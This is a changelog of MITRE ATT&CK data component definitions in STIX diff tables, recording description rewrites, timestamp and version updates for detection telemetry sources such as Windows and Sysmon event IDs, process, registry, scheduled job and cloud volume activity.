| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274698Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274698Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| An object file that contains code to extend the running kernel of an OS, typically used to add support for new hardware (as device drivers) and/or filesystems, or for adding system calls |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272119Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272119Z | 2021-10-20T15:05:19.272Z |
| Old Description | New Description |
|---|---|
| Initial construction of a new user logon session (ex: Windows EID 4624, /var/log/utmp, or /var/log/wmtp) | Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.274403Z | 2022-10-07T16:18:20.802Z |
| description | Initial construction of a new user logon session (ex: Windows EID 4624, /var/log/utmp, or /var/log/wmtp) | Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp) |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.274403Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274381Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274381Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Code, strings, and other signatures that compromise a malicious payload |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.271748Z | 2022-10-20T20:19:58.845Z |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.271748Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.271726Z | 2022-10-20T20:20:12.165Z |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.271726Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272586Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272586Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Contextual data about a named pipe on a system, including pipe name and creating process (ex: Sysmon EIDs 17-18) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273848Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273848Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.274515Z | 2022-10-20T20:18:06.745Z |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.274515Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275043Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275043Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Logged network traffic data showing both protocol header and body values (ex: PCAP) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274493Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274493Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274471Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274471Z | 2021-10-20T15:05:19.274Z |
| Old Description | New Description |
|---|---|
| Operating system function/method calls executed by a process | Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272354Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272354Z | 2022-03-30T14:26:51.806Z |
| description | Operating system function/method calls executed by a process | Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21) |
| Description |
|---|
| Logged domain name system (DNS) data highlighting timelines of domain to IP address resolutions (ex: passive DNS) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275489Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275489Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Initial construction of a new pod (ex: kubectl apply|run) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272791Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272791Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| An extracted list of pods within a cluster (ex: kubectl get pods) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272897Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272897Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Changes made to a pod, including its settings and/or control data (ex: kubectl set|patch|edit) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272840Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272840Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Opening of a process by another process, typically to read memory of the target process (ex: Sysmon EID 10) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272320Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272320Z | 2021-10-20T15:05:19.272Z |
| Old Description | New Description |
|---|---|
| Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688) | The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.272195Z | 2022-10-07T16:15:56.932Z |
| description | Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688) | The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.) |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.272195Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272172Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272172Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Changes made to a process, or its contents, typically to write and/or execute code in the memory of the target process (ex: Sysmon EID 8) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272285Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272285Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272261Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272261Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Logged network traffic in response to a scan showing both protocol header and body values |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275251Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275251Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Contextual data about an Internet-facing resource gathered from a scan, such as running services or ports |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275230Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275230Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271629Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271629Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271606Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271606Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271671Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271671Z | 2021-10-20T15:05:19.271Z |
| Old Description | New Description |
|---|---|
| Launching a list of commands through a script file (ex: Windows EID 4104) | The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.272641Z | 2022-10-07T16:16:55.269Z |
| description | Launching a list of commands through a script file (ex: Windows EID 4104) | The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.) |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.272641Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273425Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273425Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273397Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273397Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273447Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273447Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Initial construction of a new snapshot (ex: AWS create-snapshot) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273503Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273503Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Removal of a snapshot (ex: AWS delete-snapshot) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273555Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273555Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| An extracted list of snapshops within a cloud environment (ex: AWS describe-snapshots) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273600Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273600Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Contextual data about a snapshot, which may include information such as ID, type, and status |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273578Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273578Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Changes made to a snapshop, such as metadata and control data (ex: AWS modify-snapshot-attribute) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273532Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273532Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Established, compromised, or otherwise acquired social media personas |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273649Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273649Z | 2021-10-20T15:05:19.273Z |
| Old Description | New Description |
|---|---|
| An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4625 or /var/log/auth.log) | An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.271547Z | 2022-10-07T16:19:46.282Z |
| description | An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4625 or /var/log/auth.log) | An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log) |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.271547Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Initial construction of a new account (ex: Windows EID 4720 or /etc/passwd logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271482Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271482Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Removal of an account (ex: Windows EID 4726 or /var/log access/authentication logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271504Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271504Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Contextual data about an account, which may include a username, user ID, environmental data, etc. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271456Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271456Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Changes made to an account, such as permissions and/or membership in specific groups (ex: Windows EID 4738 or /var/log access/authentication logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271526Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271526Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Initial construction of a cloud volume (ex: AWS create-volume) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275094Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275094Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Removal of a a cloud volume (ex: AWS delete-volume) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275140Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275140Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| An extracted list of available volumes within a cloud environment (ex: AWS describe-volumes) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275181Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275181Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Contextual data about a cloud volume and activity around it, such as id, type, state, and size |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275161Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275161Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Changes made to a cloud volume, including its settings and control data (ex: AWS modify-volume) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275118Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275118Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271827Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271827Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Initial construction of new web credential material (ex: Windows EID 1200 or 4769) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271909Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271909Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| An attempt by a user to gain access to a network or computing resource by providing web credentials (ex: Windows EID 1202) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271933Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271933Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Opening a Registry Key, typically to read the associated value (ex: Windows EID 4656) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273968Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273968Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273900Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273900Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273923Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273923Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273944Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273944Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Contextual data about a cluster and activity around it such as name, namespace, age, or status |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | True | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.274804Z | 2022-10-20T20:54:47.331Z |
| created | 2021-10-20T15:05:19.274804Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Contextual data about a container and activity around it such as name, ID, image, or status |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
